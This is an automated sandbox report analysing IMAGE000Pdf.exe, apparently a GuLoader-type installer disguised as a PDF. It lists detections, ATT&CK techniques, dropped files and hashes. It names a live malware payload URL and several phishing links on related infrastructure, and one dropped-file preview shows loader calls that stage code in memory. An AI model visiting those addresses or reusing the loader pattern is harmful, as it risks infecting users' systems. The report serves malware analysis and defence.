      SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS22
      System Information Discovery
      Distributed Component Object ModelInput Capture11
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      IMAGE000Pdf.exe13%ReversingLabsWin32.Trojan.NsisInject
      IMAGE000Pdf.exe100%AviraHEUR/AGEN.1333748
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsx6BC0.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://173.249.193.48/VdpAwrpsFeHTHv196.binH0%Avira URL Cloudsafe
      http://173.249.193.48/VdpAwrpsFeHTHv196.bind0%Avira URL Cloudsafe
      http://173.249.193.48/VdpAwrpsFeHTHv196.bin50%Avira URL Cloudsafe
      http://173.249.193.48/VdpAwrpsFeHTHv196.binF0%Avira URL Cloudsafe
      http://173.249.193.48/VdpAwrpsFeHTHv196.bin100%Avira URL Cloudmalware
      http://173.249.193.48/VdpAwrpsFeHTHv196.bin:0%Avira URL Cloudsafe
      http://173.249.193.48/VdpAwrpsFeHTHv196.bink0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      s-part-0017.t-0009.fb-t-msedge.net
      13.107.253.45
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://173.249.193.48/VdpAwrpsFeHTHv196.binfalse
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdIMAGE000Pdf.exe, 00000003.00000001.1803045320.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
          high
          http://173.249.193.48/VdpAwrpsFeHTHv196.bin:IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.ftp.ftp://ftp.gopher.IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
            high
            http://173.249.193.48/VdpAwrpsFeHTHv196.binHIMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A74000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://173.249.193.48/VdpAwrpsFeHTHv196.bin5IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdIMAGE000Pdf.exe, 00000003.00000001.1803045320.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
              high
              http://173.249.193.48/VdpAwrpsFeHTHv196.binFIMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://nsis.sf.net/NSIS_ErrorErrorIMAGE000Pdf.exefalse
                high
                http://173.249.193.48/VdpAwrpsFeHTHv196.bindIMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A74000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://173.249.193.48/VdpAwrpsFeHTHv196.binkIMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  173.249.193.48
                  unknownUnited States
                  11878TZULOUSfalse
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1548539
                  Start date and time:2024-11-04 16:15:20 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 1s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:IMAGE000Pdf.exe
                  Detection:MAL
                  Classification:mal88.troj.evad.winEXE@3/11@0/1
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • VT rate limit hit for: IMAGE000Pdf.exe
                  No simulations
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  173.249.193.48stormskridtets.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 173.249.193.48/dlDSZQaZvoFz216.bin
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  s-part-0017.t-0009.fb-t-msedge.nethttps://email.abprotector.com/c/eJwUzU2OrCAQAODTwE4DBc3PgsXbeA1TUuWTDDadBsfJnH7SB_jyUbIRYDeSk_ZGuQA6RHkkAJfRs995x93paDmToYhsSONmUJbkPARNlh5b9LiCecRgLQQvrAIm0OTdtG0WJ-uUnTYinBwhZ_ocIc4nliprOsZ4dWH-CVgELPd9z6_8v2Lv3OfcTgFL53y9mdbrt62v9h5YBSzlSfwzH-Os8p36WcbRbn5a9RBWtWvU1r4-XI5yci1PXgslbYwJwSvj5XeCvwAAAP__4WRNQg#ZWJhbGxvdHZvdGVAY28ubW9ubW91dGgubmoudXM=Get hashmaliciousHTMLPhisherBrowse
                  • 13.107.253.45
                  https://principledx-doc.jimdosite.com/Get hashmaliciousUnknownBrowse
                  • 13.107.253.45
                  mesh.exeGet hashmaliciousMeshAgentBrowse
                  • 13.107.253.45
                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • 13.107.253.45
                  https://add-to.password.land/XNllJMExLQVFyaWl5RE1YdDdhREtzbDBIbUhKUWZTY2ZQVkZiR3Ywa2p5V3k2UkMrNWZ5UzVndXdpaEgvVnQ0QU8wOHpNN3hlNmFRc2EzWUo4ajB3eHp2WE0vVWpoanlDVHlVU05nYytLS0doVmZ4bzdSKzhTMFJLdUlMb1IvMXgrUmtkRzFHWWp3OGJub29qR0paOGovZzgwNjJwN1l0bVJNeS9lcktlUTVKcC9SUGF5N0ZsLS16Q2pVSTZxanFackJzbkFELS02ZFg0VzVRcHhlYVZJTGxKMjZLS2h3PT0=?cid=289916869Get hashmaliciousHTMLPhisher, KnowBe4Browse
                  • 13.107.253.45
                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • 13.107.253.45
                  https://sites.google.com/view/wek-3/homeGet hashmaliciousUnknownBrowse
                  • 13.107.253.45
                  Cxn80OsiM7.lnkGet hashmaliciousUnknownBrowse
                  • 13.107.253.45
                  FYI - Important.emlGet hashmaliciousUnknownBrowse
                  • 13.107.253.45
                  https://u47945148.ct.sendgrid.net/ls/click?upn=u001.9dvlopked3ris1nGcg14tPoM2A6CMemwZTDaRJoJq4jd7aIhsCDiiF2Uij5IX7IoxVCNb-2FU4GsxYRODT1XUt1-2BXsg4u2g6Xv7shi2KwA-2FQ0VxkUU7juHjUqhbVn-2Fx-2FcAGopnnm1kau3tQQMpfw5xQFcDDVCozNu9Qyz7TzkumNBcbmYS-2Fu0kcIQspHiDUP2GhsTydKpS05-2BUeDpna42R9gt8HVX5idvNxxW0Rs3x6Ek-3DTwYh_LbbiPRomajq-2F7SGqyRvSw-2FNX0BITv-2BL6GwFnEIs1N9jaD15T-2Faxa1SVV9dIOP1zKaaT4o1-2FajqyF-2FaKEpXZx40vSHjXkiSxb5l95BlWPN55WYqUlP31dA8uqWHqgobqgROB6gzPV6zyssP1ziZmejtco0MbI5H9fZb88Hj6H0vbPNu4SR3uxkHx0yEGTp4o-2F-2FAizUgF470FdzITJvs3E6v4P2lmQzMW-2B8fGrGjzN2iBGSfUxjRv0UHBG7wd3HMu32F-2Bz5NKlNql3g-2F2UnDfMjIaFvxv19Ttsbh0Dsvb73IqidNRCVrkdO6w3jJ1PBiTPQWnFoyLlvb-2BM-2BpSkM-2F62MWH4w8G4ZApGK9YvJKaCr9Oe2D0qt94RV8Y0yQlnWPvRViSTFaEbOec2Jd2UBTQ-2BXTxj55rra0wiS7odecDuo3rkk8ZIfxhrhs1M7zqfwefLDZDZ8tDcTW-2F4Ps4ejTITe17wya4NiMnkyPr5mFpqfENoZ7QiMhoyVlzuI8muURtGjCfPZdNj4aSOzOitmsu4TQ-3D-3DGet hashmaliciousUnknownBrowse
                  • 13.107.253.45
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  TZULOUSstormskridtets.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 173.249.193.48
                  Brneforsorgspdagogers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 173.249.193.66
                  Brneforsorgspdagogers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 173.249.193.66
                  la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                  • 173.249.236.72
                  byte.arm5.elfGet hashmaliciousOkiruBrowse
                  • 173.249.236.51
                  https://tcmedcenter-my.sharepoint.com/:f:/g/personal/jessica_larson_tcmedcenter_org/Ek1X93Tsfp5KoiWqKbJ_ocQBqlE2wGVJqWkJh4H7mn0vuw?e=Yni2o7Get hashmaliciousUnknownBrowse
                  • 173.249.199.16
                  D6wsFZIM58.elfGet hashmaliciousUnknownBrowse
                  • 173.249.236.64
                  https://netorgft4648155-my.sharepoint.com/:f:/g/personal/cgriffith_nationsbest_net/ErhP9j6s6O5LtAYvSf-k7fgBJJeB0TUcEyK1gf2JqcFeEw?e=iS1Nd2Get hashmaliciousUnknownBrowse
                  • 173.249.199.16
                  http://www.multichainbridges.com/Get hashmaliciousUnknownBrowse
                  • 198.54.132.29
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\nsx6BC0.tmp\System.dllstormskridtets.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    orders_PI 008-01.exeGet hashmaliciousRemcos, GuLoaderBrowse
                      RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                        8737738_19082024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                          8737738_19082024.vbsGet hashmaliciousGuLoaderBrowse
                            Dhl Delivery(AWB 9849791014).exeGet hashmaliciousGuLoaderBrowse
                              Dhl Delivery(AWB 9849791014).exeGet hashmaliciousGuLoaderBrowse
                                89.htaGet hashmaliciousCobalt Strike, GuLoaderBrowse
                                  sahost.exeGet hashmaliciousGuLoaderBrowse
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):52
                                    Entropy (8bit):4.0121618346445365
                                    Encrypted:false
                                    SSDEEP:3:BPi4YDgAmcAKDHMnhv:BPiBkAmc0nhv
                                    MD5:F298228D2D42CED0A00B0C5320000835
                                    SHA1:FB06F02DDCDA4C9EC752A688EE617064DB3A49EB
                                    SHA-256:E399AFE89F97EAE7BCDAE626913DA1618F4F42BA11887217CDBF524720532AB2
                                    SHA-512:464DA89F9E1D5935810443B20C3D19F77585D964DF89F5CB427482A03C8EF6274D06CBC01533D92C691FFD55E1725BA5F427D023A45A5128BCED0EEE11E083FE
                                    Malicious:false
                                    Reputation:low
                                    Preview:[skaaltalerens]..nonsaleability=sammenstuvningerne..
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):12288
                                    Entropy (8bit):5.737556724687435
                                    Encrypted:false
                                    SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                    MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                    SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                    SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                    SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: stormskridtets.exe, Detection: malicious, Browse
                                    • Filename: orders_PI 008-01.exe, Detection: malicious, Browse
                                    • Filename: RemotePCViewer.exe, Detection: malicious, Browse
                                    • Filename: 8737738_19082024.vbs, Detection: malicious, Browse
                                    • Filename: 8737738_19082024.vbs, Detection: malicious, Browse
                                    • Filename: Dhl Delivery(AWB 9849791014).exe, Detection: malicious, Browse
                                    • Filename: Dhl Delivery(AWB 9849791014).exe, Detection: malicious, Browse
                                    • Filename: 89.hta, Detection: malicious, Browse
                                    • Filename: sahost.exe, Detection: malicious, Browse
                                    Reputation:moderate, very likely benign file
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):589
                                    Entropy (8bit):4.277818373535095
                                    Encrypted:false
                                    SSDEEP:12:mScXAtJsdW8lLQIVVCTP1t0laiam6mObo/Bpqwnh2yKbdB1j1f:mSrTsdRTVVM9Yz69Hwh2yKb7ff
                                    MD5:E80E34F461528DF8F86C4248C971B2AD
                                    SHA1:A1A74D8F5711DEED35AF2B81BE070CA471C39500
                                    SHA-256:F2552D843F4D62F481743A15B7C95AA322C14EA5DBB999C8C889A42CBB093A8E
                                    SHA-512:46A5D6487131677DAC16C2BE4FC29517C14CB8DB6228B40344D733597462122EF0D1D7DD69B4D5A7A10F9C86635F99D91E91AC2CEBDF923C6B72EF3809637622
                                    Malicious:false
                                    Reputation:low
                                    Preview:pervalvar udvalgsarbejderne illegitime besully.trvarefabrikkers stemmeslugers binomialfordelingernes metropolit.mariolatrous griffy fiskeeksporten valutapuklerne spekulanter infusioners quantifys unconsolidation digitalises forvaltningsret..steticismens advents syde rebaptization returneredes chemosterilants agtvrdige,balklines sludres drengestregers topful koordinatvrdien angorakats tendensromanens blockheadish lidelsesfller eskapismes amiably phenicious nontenurial..overspringe udmntede agnostiker polycarpic stolper lbskes forhandlingsomraader acquires duskly kildnes gaultherase..
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):276701
                                    Entropy (8bit):1.2570216910370695
                                    Encrypted:false
                                    SSDEEP:768:yFPJSwGwS4JXi8PNDQNMDeMW3SGBqGHw1zwpmPMoaO64g1abi4IZxeMcdN9vfd95:/rFf4EoTti54LkFvI3oDW
                                    MD5:18C3DA2AA022FF0B89999E28E6A2AE9A
                                    SHA1:0659DDE0FD4B39B22825F1645A0BAE7E7202C7F9
                                    SHA-256:05DE1FF63CC38C7C4B3034091A311791BFF578658FF17D156AA4FB41A2E197C6
                                    SHA-512:D3A51D8B29FEF026F94B339087413319E03DA3193D9159A43AD7B4FEE35A67EEEBC3E66A0092B5ED14F57458173D518C618F2EE00F4203F428EBE0FC162F667C
                                    Malicious:false
                                    Reputation:low
                                    Preview:......................................................(.L.................................3........&.................."...........l........................s.....................................-...........................8..........@.........................................................h..................................@.........).........................I.................F..................................................................T..............................................................j..".......#I.............r.............&..................|...............................................................................:.Z......................).............................................................................H.......C...........................................................................................t.........................................................M.............4........'........................................}..+.......................
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):313672
                                    Entropy (8bit):1.2567166720965932
                                    Encrypted:false
                                    SSDEEP:768:iEGLlMkjkYtwS3MeXM3OpckON5VIbjnI3Oif4NxZSqJbDvz+hE7IkHAYsaW3DQLF:LtWLdp3I3yrt+3SoTMU5oT5
                                    MD5:17B0342D31B6E728E13DF79009833371
                                    SHA1:B9F3354C4E886382D220D5EC4FA91F389585BD40
                                    SHA-256:8CAF84CE635BD92186709E81D12AE352E049C83B53F1C22A6DCB221E8F1C011E
                                    SHA-512:4772F5AE64E0619B23114A41785DDE7DD1A9BACE12A9ABEDEF3400EDB3660D4E780C9B91E23A9FDEC1D97BCF7DC48E201771D7D58EB1740191A05CCFDB433C83
                                    Malicious:false
                                    Preview:....................N............................k....................................................#.................................................................................`........0.............u...................................y................................................................g.........7................E.......&........w..............................................*....................<..................................3................i.......................................................................U...).................................................. ........................................................................................................................A..............................N......c.b.......................................................................................................N........T..............................................h..............................................................................
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):207881
                                    Entropy (8bit):7.331635651026833
                                    Encrypted:false
                                    SSDEEP:3072:zDyy/gxfmTCBeuVaCzUVI90J8g5sF6963goPdEWduKiKMLUW3tTS4NrQsgT99BwE:zDyR4WDsCgVImsE77KMLUS44NMx
                                    MD5:749F30B7C897431F55057BFE15DF7228
                                    SHA1:2DB933559839DD5F79454546C98CCE8E9C4C8112
                                    SHA-256:1506167C68DEBF892BD0E2EAD9515C1F3F80BCCA9C489E715F2436425B7D8D48
                                    SHA-512:8E6BC090DFE67D411EA2B386538BAF9ADE1C7A47031CD4BFA0E7D491CFEF814923E71BA1DF8A2CB0A41AFADAE896F77BD89170BB560112E2A2B7BAA8DCD60C9D
                                    Malicious:false
                                    Preview:............ ..............EEEEE...............n..............C....F.......mm...........D..............ttt...--........``..:::....S....rrrr............P.O..6....".GG...............#.0.....................E..............22...~~.......aa............,..................................&..gg........77..LLLLLL.......ii.......0..o.ff..}.x... .99.....RR...............~~~~~.....................J......................kkk........E..........C...ee.........................G............J.............YY..~...2.............l........##.........Z.........(...........h.y........000.......yy...........l..lll...........................88...@@@@@.QQ..........^^...........mm...................CCC........KKKK.........2...............++..........V......-................B.........w................ ..............!!!....MM......66................===....................NNN..........S....??.........k........D.................................(............................. .........////....x.ccc.ZZ.w..====......
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16857
                                    Entropy (8bit):4.532822901243277
                                    Encrypted:false
                                    SSDEEP:384:+ipfHtyeVOvFfo92BAVO4tKq/vChYFVmuF1WbTeqFb7RfW:dlyttfo9iAVO4tiGmPZW
                                    MD5:143CC97C03735690BA675F029A4A3A16
                                    SHA1:7BBA23E28EDB92B05620AA4EA667D3C04DE93593
                                    SHA-256:EDCF653A613FF7FB1143DF97441A7027D486CA942A333F3EA0B74C7C11F3D88B
                                    SHA-512:01C2C26B31488E036F6C6634636B33A0C06672FF464549D12B653326FA1A90460FAF485C59D8F0B85C6CCF57946AC4D09A70B5A5D3609E93AD3DCDE421CF16A7
                                    Malicious:false
                                    Preview:.........UU..33........Z..nnnnnn....w.[..............EE................T.......................k..8e...r...n...e...l.N.3...2..M:...:.+.C...r..de...a...t...e...F.h.i...l...e...A...(...m... ...r...4... ...,... ...i... .&&0..cx...8...0...0...0...0...0...0...0...,..w ...i..w ...0...,... ...p... ...0...,... ...i... ...4...,... ...i... ..?0...x...8...0...,... .%%i... ...0...)...i.......r...8.......k...e...r...n...e...l._.3.~.2...:...:...S.**e...t..aF...i...l...e...P...o...i...n...t...e...r...(...i... ...r...8...,... ..vi... ...2...3...0...1...2... ...,... ...i... ./.0...,...i... ...0...)...i.......r...4.......k...e...r...n...e...l...3...2.s.:...:...V...i...r...t...u...a...l...A...l...l...o..Nc...(...i..y ...0...,...i... ...5...4..B0...6...7...2..N0...0...,... .ddi..G ...0...x...3...0...0...0...,... ..Bi... ...0...x..v4...0...)...p...../.r...2.......k...e...r.}.n...e...l..B3...2..U:...:...R.+.e...a...d...F...i...l...e...(...i... ...r...8...,... ...i... ...r...2...,... ...i... ..^5...4...0...6
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):244482
                                    Entropy (8bit):1.2509108197987615
                                    Encrypted:false
                                    SSDEEP:768:ArczTS8oocp0tWLSMkXWg7PKU30gfL4Qf1AUdyM03I3xkjFlu7NDSAZd+6XYIHXd:7Yhp0ckXv78owAC3MhxqI
                                    MD5:E6AC7A31DA2D4322339135AD20EB0F23
                                    SHA1:F76C6D6EE7C9B01DB799642990AA88B140003EC4
                                    SHA-256:00FAD7EC11DB9706955FDF3BE0E6FB037E9F9780F94A502A774B30AB52773A94
                                    SHA-512:C87DABB08D092D546FF80270B052CF1C5D92D25852DBFECC139CE528CCD2A22CCE130A8C90C08117DF542E6D83DE91E92180F853C201F042BED4681D4737E75D
                                    Malicious:false
                                    Preview:............................................w.........................................................................\.............................o.............q......................................]..........................I...............!...............................................m....... ............................................................................................h......K................=............................................................r..................................W....................................................................R......................................p..0...........................................................k.........k........................d........................................................................................................................9....................................#.....A........`...9...............P.......................................................................\...............
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):430713
                                    Entropy (8bit):1.2530301266200883
                                    Encrypted:false
                                    SSDEEP:1536:vu65sFtuGbUq4CCWG9TcLs9xEEc0MVWFnhMA:2PjbUquWUYs/9x
                                    MD5:8ED0D91C7C65B02A5630D1A012895C3D
                                    SHA1:FA74C3BD3A32123D71AEA67D386B5AC251FEC260
                                    SHA-256:1113E4990BEF55E4CD1D868513B2305C72803FB296D559BFA9C8C93DE2EDC8AB
                                    SHA-512:FBE41906CCABB44E8D71D7664B756F75ABDBF0FB80BFCBBF4BBA9D9370DF4CEDBE437BA9F116B3F9E9D2AE2FB1E2D34D34F152E518A2E5E0096A506093F8DB24
                                    Malicious:false
                                    Preview:..[.Z.....?............#......................................................0.....B..x....................................................Q.......Z......................I....j............{..........................................................................................................................................-.....7..............................M........9.U...........?...............................................................X..................../.....................t...............4................,........`........~..............d............................u............{.....................a.............................5.............{...g....Z.................H................l..........................S.............................................................................................................................J...........................................U............................x.....f.............D..../....o........................QLi...
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):223405
                                    Entropy (8bit):1.2642457624863013
                                    Encrypted:false
                                    SSDEEP:768:DDh04DrooyUGbNSipoS0yYEt0ihBLBJU06zf8VWZt+il3sVxTD6I6o9+2u5inuB4:rorpFGQVWwj9bQdun2ljrAbUGl
                                    MD5:96E6C0CBBACF232110DF3E7FC4B4D980
                                    SHA1:FC18FDD4E5417AC76F68BF507AC0BA6B9A183CFE
                                    SHA-256:04F64748055424253509A229EE3E6F9BFC86898CBA667DA8312333552987B610
                                    SHA-512:8DD22ABBED1522A08E9AC3559F5CC6871B77C1B76C2A7AA0CD61E52CA7D3A43DCBAF00285BF29C1FF885FC5F424FA411F56F19EB1886DA97CC7010BCA66530A9
                                    Malicious:false
                                    Preview:....................................{............!.............Q.............................................................................:...........z..................................W.......................... ......................................3...........y...............j................!n...............................................................................3........................+.......................a.......................c........................................)............................................................................................................................?.............................................................................................S....../.....................................................6./...t..+.......................H............{..........&................................b............................R.......x....=..................V....]........>...................................m................0.....
                                    Process:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    File Type:DIY-Thermocam raw data (Lepton 2.x), scale 175-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8.000000
                                    Category:dropped
                                    Size (bytes):385914
                                    Entropy (8bit):1.2561626561864936
                                    Encrypted:false
                                    SSDEEP:768:++TtgE2yMxqLKoiyt4CpVdIwu3Uema6LhlEv9cCAXP69rBqGDpx/NEJKTPLqqQJl:bMFgNCAE6oLJS9a/IrOyTWq2uC
                                    MD5:A4946227DE4DC2A79BF473A3D09C4247
                                    SHA1:9FF800E6B4A72B6281D812710D00AD003F757170
                                    SHA-256:1F6BB50C9AC95A61782FCDE006B6E396ACEDA7794FD30FFB7D97020FD7B8059E
                                    SHA-512:2902630584092375E1A2FB4669437C43548BC0D0E00B2B98A3FDAEEDC57F3567B61A3FC545C8157FD410D6E26C9A70E8D989E97983700FFB55D9D1154CEBE1F4
                                    Malicious:false
                                    Preview:..................................................#..................................._............................{.........................P................$.............................................................................................}............&................g.........................................A................................................K................................................Z..............-......5.........................................................e.......d..........................................L...............0......C................).................................................................................r............Q..2........................9................(...............................................t......................................................................>.....b..8.....................n.............]..................F.....................................U...................................S.........
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):6.460432078632097
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:IMAGE000Pdf.exe
                                    File size:915'632 bytes
                                    MD5:53441f2de2d573f3b2e4fb35c248229b
                                    SHA1:afc840f25adfcb5873f5b69e55b2920c370a2285
                                    SHA256:5bc4b28288f068f1c11e69b1cc94aacb4b0d2812494c1673471b890f1ce67a9e
                                    SHA512:021ba2fc3570b82daf0181f229e5e0b80a10f6a74a3f77baa4d608961c38222b03d428f82b7d5abfca6fa55cbfebc7b5e715f33ecf8f67882186b6601bfcbda2
                                    SSDEEP:12288:A3nIRS5/vuI8sOabBdHdWIXjwxipfpQGYAGau5yxX9O9u:A3IRgvuoO0pdZXjUiNuGYpawA9uu
                                    TLSH:59156949A38C50C6DD3A3B32FA1D7613B655AC138550118A3AC8BE583BF57B07B9FA31
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....
                                    Icon Hash:d3672eac1a0c662c
                                    Entrypoint:0x4034a2
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                    Signature Valid:false
                                    Signature Issuer:CN=Underretternes, O=Underretternes, L=Lannemezan, C=FR
                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                    Error Number:-2146762487
                                    Not Before, Not After
                                    • 25/01/2024 09:16:23 24/01/2027 09:16:23
                                    Subject Chain
                                    • CN=Underretternes, O=Underretternes, L=Lannemezan, C=FR
                                    Version:3
                                    Thumbprint MD5:B7699D9FC11FF2BC8B537A1496DBA607
                                    Thumbprint SHA-1:13E2B15CFFB46BFE6E63F1DDDD5D08B90EC97D8B
                                    Thumbprint SHA-256:B488D28F491B0130739761D68A25298DFD95A7D90A466B370C1D833271156981
                                    Serial:0C38DED2C7C23BE59C80206BBCC81E7BF88A1876
                                    Instruction
                                    sub esp, 000002D4h
                                    push ebx
                                    push esi
                                    push edi
                                    push 00000020h
                                    pop edi
                                    xor ebx, ebx
                                    push 00008001h
                                    mov dword ptr [esp+14h], ebx
                                    mov dword ptr [esp+10h], 0040A2E0h
                                    mov dword ptr [esp+1Ch], ebx
